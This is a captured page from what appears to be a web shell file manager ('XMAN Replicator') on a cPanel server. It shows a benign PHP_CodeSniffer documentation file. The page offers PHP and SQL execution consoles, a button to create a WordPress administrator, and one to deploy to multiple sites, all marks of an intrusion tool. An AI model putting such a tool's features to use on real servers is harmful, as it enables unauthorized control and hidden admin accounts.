🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
opt
/
cpanel
/
ea-wappspector
/
vendor
/
squizlabs
/
php_codesniffer
/
src
/
Standards
/
Squiz
/
Docs
/
Scope
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2025-11-04 16:30
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2025-11-04 16:30
🔄
🗑️
🗑️📁
⬇️
🔒
StaticThisUsageStandard.xml
644 B
-rw-r--r--
2025-11-04 16:30
✏️
🔄
🗑️
⬇️
🔒
View: StaticThisUsageStandard.xml
<documentation title="Static This Usage"> <standard> <![CDATA[ Static methods should not use $this. ]]> </standard> <code_comparison> <code title="Valid: Using self:: to access static variables."> <![CDATA[ class Foo { <em>static</em> function bar() { return <em>self</em>::$staticMember; } } ]]> </code> <code title="Invalid: Using $this-> to access static variables."> <![CDATA[ class Foo { <em>static</em> function bar() { return <em>$this</em>->$staticMember; } } ]]> </code> </code_comparison> </documentation>
PHP Console
Execute
SQL Console
Execute